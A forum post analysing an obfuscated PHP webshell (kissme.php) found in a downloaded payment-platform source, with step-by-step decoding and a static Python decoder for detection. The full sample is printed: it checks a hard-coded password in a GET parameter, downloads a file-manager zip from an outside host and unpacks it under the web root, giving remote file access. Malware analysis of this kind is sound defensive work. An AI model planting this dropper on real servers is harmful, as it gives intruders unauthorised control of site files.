[Share] Saying hello with a quick analysis of a small PHP webshell

z3960 

A few days ago I downloaded the source of a payment platform from the web and found that one file in it, kissme.php, was flagged as malicious. The code extracted from it is shown below. I couldn't be bothered to tidy it up by hand, so I dropped it into an online beautifier and got this code:

```php
<?php
if (!defined("AAAGAGA")) define("AAAGAGA", "AAAGAAG");
$GLOBALS[AAAGAGA] = explode("|^|K|3", "H*|^|K|341414741474747");
// defines the constant AAGAGGG as ord(1) == 49; it is used below as an arithmetic "key"
if (!defined(pack($GLOBALS[AAAGAGA][00], $GLOBALS[AAAGAGA][0x1]))) define(pack($GLOBALS[AAAGAGA][00], $GLOBALS[AAAGAGA][0x1]), ord(1));
if (!defined("AAAGGAA")) define("AAAGGAA", "AAAGAGG");
$GLOBALS[AAAGGAA] = explode("|v|t|Z", "H*|v|t|Z41414741474741|v|t|Z41414741474147|v|t|Z7C3A7C2D7C35|v|t|Z7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B");
if (!defined(pack($GLOBALS[AAAGGAA]{0}, $GLOBALS[AAAGGAA]{01}))) define(pack($GLOBALS[AAAGGAA]{0}, $GLOBALS[AAAGGAA]{01}), pack($GLOBALS[AAAGGAA]{0}, $GLOBALS[AAAGGAA][02]));
// table of function names the shell calls indirectly (decoded further down in the post)
$GLOBALS[AAGAGGA] = explode(pack($GLOBALS[AAAGGAA]{0}, $GLOBALS[AAAGGAA]{3}), pack($GLOBALS[AAAGGAA]{0}, $GLOBALS[AAAGGAA][0x4]));
if (!defined("AAAGGGA")) define("AAAGGGA", "AAAGGAG");
// table of string constants: parameter name, password, download URL, file names, HTML
$GLOBALS[AAAGGGA] = explode("|K|H|a", "H*|K|H|a41414747414147|K|H|a646566696E65|K|H|a41414747414141|K|H|a70|K|H|a|K|H|a3070656e2e736573616d65|K|H|a687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970|K|H|a2E2F6B6F642E7A6970|K|H|a772B|K|H|a6B6F642E7A6970|K|H|a6B6F642F|K|H|a3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A");
if (!$GLOBALS[AAGAGGA]{0x1}(pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA]{1}))) call_user_func(pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA][02]), pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA]{1}), pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA]{03}));
$GLOBALS[AAGGAAG] = array($_GET);
// reference aliases; they only exist to make the real variable names harder to read
$AGAAAAG = & $passwd;
$AGAAAAA = & $ch;
$AAGGGGG = & $source;
$AAGGGGA = & $data;
$AAGGGAG = & $destination;
$file = & $AAGGGAA;
$AAGGAGG = & $zip;
$file_path = & $AAGGAGA;
// (0 - 1225 + 25 * AAGAGGG) evaluates to 0, so this reads $_GET[<param name>]
$AGAAAAG = isset($GLOBALS[AAGGAAG][(0 - 1225 + 25 * AAGAGGG)][pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA]{4})]) ? $GLOBALS[AAGGAAG][(0 - 1225 + 25 * AAGAGGG)][pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA]{4})] : pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA][05]);
// bail out unless the supplied value equals the hard-coded password
if ($AGAAAAG != pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA][06])) {
    exit;
}
// download a zip over curl; (AAGAGGG * 41 - 2008) evaluates to 1
$AGAAAAA = curl_init();
$AAGGGGG = pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA]{07});
curl_setopt($AGAAAAA, CURLOPT_URL, $AAGGGGG);
curl_setopt($AGAAAAA, CURLOPT_RETURNTRANSFER, (AAGAGGG * 41 - 2008));
$AAGGGGA = curl_exec($AGAAAAA);
curl_close($AGAAAAA);
// write the downloaded bytes to disk via the indirect fopen / fputs / fclose
$AAGGGAG = pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA]{0x8});
$AAGGGAA = $GLOBALS[AAGAGGA]{02}($AAGGGAG, pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA][011]));
$GLOBALS[AAGAGGA]{03}($AAGGGAA, $AAGGGGA);
$GLOBALS[AAGAGGA]{0x4}($AAGGGAA);
// unpack the archive next to the shell
$AAGGAGG = new ZipArchive();
if ($AAGGAGG->open(pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA][012])) === true) {
    $AAGGAGG->extractTo(pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA]{11}));
    $AAGGAGG->close();
}
// remove the zip again (indirect is_file / unlink) and print a link to what was unpacked
$AAGGAGA = pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA]{0x8});
if ($GLOBALS[AAGAGGA]{05}($AAGGAGA)) {
    if ($GLOBALS[AAGAGGA][6]($AAGGAGA)) {
    }
}
echo pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA]{0xC});
?>
```

Now it looks a bit easier on the eyes, so let's start analysing it step by step. We go straight for the longer strings; look at line 7 of the beautified listing:

```php
$GLOBALS[AAAGGAA] = explode("|v|t|Z", "H*|v|t|Z41414741474741|v|t|Z41414741474147|v|t|Z7C3A7C2D7C35|v|t|Z7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B");
```

The explode function splits its second argument into an array using its first argument as the delimiter. We can add a print_r call to output the $GLOBALS[AAAGGAA] array and see the result:

```
Array
(
    [0] => H*
    [1] => 41414741474741
    [2] => 41414741474147
    [3] => 7C3A7C2D7C35
    [4] => 7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B
)
```

Now take the array above and debug-print it with `echo pack("H*","41414741474741");` (the first argument is [0] of the array above, the second is [1], [2], [3] and [4] of the array above in turn), which gives the following:

```
    [1] => AAGAGGA
    [2] => AAGAGAG
    [3] => |:|-|5
    [4] => |:|-|5defined|:|-|5fopen|:|-|5fputs|:|-|5fclose|:|-|5is_file|:|-|5unlink
```

Here [3] and [4] have the same shape as the code above: [3] is the delimiter and [4] the payload. Splitting [4] into an array again gives:

```
(
    [0] =>
    [1] => defined
    [2] => fopen
    [3] => fputs
    [4] => fclose
    [5] => is_file
    [6] => unlink
)
```

At this point the declaration part is essentially done.

--------------------------------------------------------------------------------

Now we continue, to line 33 of the beautified listing:

```php
$GLOBALS[AAAGGGA] = explode("|K|H|a", "H*|K|H|a41414747414147|K|H|a646566696E65|K|H|a41414747414141|K|H|a70|K|H|a|K|H|a3070656e2e736573616d65|K|H|a687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970|K|H|a2E2F6B6F642E7A6970|K|H|a772B|K|H|a6B6F642E7A6970|K|H|a6B6F642F|K|H|a3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A");
```

Using the same method, we get the array contents:

```
Array
(
    [0] => H*
    [1] => 41414747414147
    [2] => 646566696E65
    [3] => 41414747414141
    [4] => 70
    [5] =>
    [6] => 3070656e2e736573616d65
    [7] => 687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970
    [8] => 2E2F6B6F642E7A6970
    [9] => 772B
    [10] => 6B6F642E7A6970
    [11] => 6B6F642F
    [12] => 3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A
)
```

Decoding each entry with pack in turn gives the following:

```
    [1] => AAGGAAG
    [2] => define
    [3] => AAGGAAA
    [4] => p
    [5] =>
    [6] => 0pen.sesame
    [7] => http://static.kodcloud.com/update/download/kodexplorer4.40.zip
    [8] => ./kod.zip
    [9] => w+
    [10] => kod.zip
    [11] => kod/
    [12] => <a href="./kod" target="_blank">执行成功点击进入</a>
```

(The text in [12] reads "Executed successfully, click to enter".)

At this point we have basically worked out what the shell does. Its author relies on KodCloud's (可道云) file manager. In the decoded output above, [4] is the parameter name for the shell's connection password and [6] is the password itself ("open sesame"??). Once the password parameter is supplied, the server fetches the KodCloud file-manager zip package and extracts it; the extracted files land in the kod folder under the shell's own directory. It then returns a link, and clicking it goes straight into the file manager.

Verifying the shell: put kissme.php in a directory and browse to http://127.0.0.1/kissme.php?p=0pen.sesame. After a moment the link is output, and clicking it opens the KodCloud file explorer...
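The decoding the post does by hand with print_r and pack can be done statically, without ever executing the sample. The following Python script is an added example and is not part of the original post or of the kissme.php sample: it emulates PHP's explode plus pack("H*") on the three explode() lines quoted above (embedded as a constructed input string), applies the second-level explode the shell performs on $GLOBALS[AAAGGAA][3] and [4], and lists the URL and PHP function names that fall out. The function names extract_tables, nested_splits and indicators, and the list of PHP function names it looks for, are this example's own choices and not anything from the sample.

```python
import re
from typing import Dict, List

# Constructed input: the three explode() lines quoted in the post, copied verbatim
# from the kissme.php listing. Nothing here is executed as PHP.
SAMPLE_PHP = r'''
$GLOBALS[AAAGAGA] = explode("|^|K|3", "H*|^|K|341414741474747");
$GLOBALS[AAAGGAA] = explode("|v|t|Z", "H*|v|t|Z41414741474741|v|t|Z41414741474147|v|t|Z7C3A7C2D7C35|v|t|Z7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B");
$GLOBALS[AAAGGGA] = explode("|K|H|a", "H*|K|H|a41414747414147|K|H|a646566696E65|K|H|a41414747414141|K|H|a70|K|H|a|K|H|a3070656e2e736573616d65|K|H|a687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970|K|H|a2E2F6B6F642E7A6970|K|H|a772B|K|H|a6B6F642E7A6970|K|H|a6B6F642F|K|H|a3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A");
'''

# Matches: $GLOBALS[NAME] = explode("SEP", "PAYLOAD");
EXPLODE_RE = re.compile(r'\$GLOBALS\[(\w+)\]\s*=\s*explode\("([^"]+)",\s*"([^"]*)"\);')
HEX_RE = re.compile(r'^[0-9A-Fa-f]*$')

# PHP functions worth surfacing when they appear as decoded strings (this example's own list).
KNOWN_PHP_FUNCS = {
    'define', 'defined', 'fopen', 'fputs', 'fwrite', 'fclose', 'is_file', 'unlink',
    'file_put_contents', 'curl_exec', 'eval', 'assert', 'system', 'exec',
    'shell_exec', 'passthru', 'call_user_func',
}


def php_pack_hex(hexstr: str) -> str:
    """Emulate PHP pack("H*", $hex): high nibble first; a dangling odd nibble is padded with 0."""
    if len(hexstr) % 2:
        hexstr += '0'
    return bytes.fromhex(hexstr).decode('utf-8', errors='replace')


def decode_explode_table(separator: str, payload: str) -> List[str]:
    """Emulate explode(sep, payload), then pack(table[0], chunk) for every later element.

    Index 0 is kept as the literal format string so indices match what print_r shows."""
    parts = payload.split(separator)
    fmt, chunks = parts[0], parts[1:]
    if fmt != 'H*':
        raise ValueError(f'unexpected pack() format {fmt!r}')
    bad = [c for c in chunks if not HEX_RE.match(c)]
    if bad:
        raise ValueError(f'non-hex chunk(s) in table: {bad}')
    return [fmt] + [php_pack_hex(c) for c in chunks]


def extract_tables(php_source: str) -> Dict[str, List[str]]:
    """Find every $GLOBALS[...] = explode(...) and return the decoded table per name."""
    return {name: decode_explode_table(sep, payload)
            for name, sep, payload in EXPLODE_RE.findall(php_source)}


def nested_splits(table: List[str]) -> Dict[int, List[str]]:
    """Second-level explode: an entry that is itself a delimiter (non-empty, not alphanumeric)
    and prefixes a later entry gets that later entry split on it, exactly as the shell does
    with $GLOBALS[AAAGGAA][3] and [4]. Index 0 (the pack format) is never a delimiter."""
    out: Dict[int, List[str]] = {}
    for i in range(1, len(table)):
        sep = table[i]
        if not sep or sep.isalnum():
            continue
        for j in range(i + 1, len(table)):
            if table[j].startswith(sep):
                out[j] = table[j].split(sep)
    return out


def indicators(tables: Dict[str, List[str]]) -> Dict[str, List[str]]:
    """Pull the strings a defender cares about out of the decoded tables."""
    strings: List[str] = []
    for table in tables.values():
        strings.extend(table[1:])
        for parts in nested_splits(table).values():
            strings.extend(parts)
    return {
        'urls': sorted({s for s in strings if s.startswith(('http://', 'https://'))}),
        'php_functions': sorted({s for s in strings if s in KNOWN_PHP_FUNCS}),
    }


if __name__ == '__main__':
    tables = extract_tables(SAMPLE_PHP)
    for name, table in tables.items():
        print(f'${name}:')
        for i, value in enumerate(table):
            print(f'  [{i}] => {value!r}')
        for j, parts in nested_splits(table).items():
            print(f'  [{j}] exploded again => {parts}')
    print(indicators(tables))
```

Running it prints each table with the same indices the post shows ([0] => H*, [6] => 0pen.sesame, and so on) and then the URL and function-name summary. The point of decoding this way is that the shell's pack/define chain is only data until PHP evaluates it; an analyst who replicates the transformation gets the same strings without running the dropper, and the strings it emits are what you hand to detection: the query parameter name in web-server access logs, outbound requests to the download host, and a new kod/ directory appearing under the web root.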
Reply 1, by a super moderator, posted 2022-01-25:

Taking a look.
Reply 2, by a super moderator, posted 2022-01-25:

Not bad, learned something.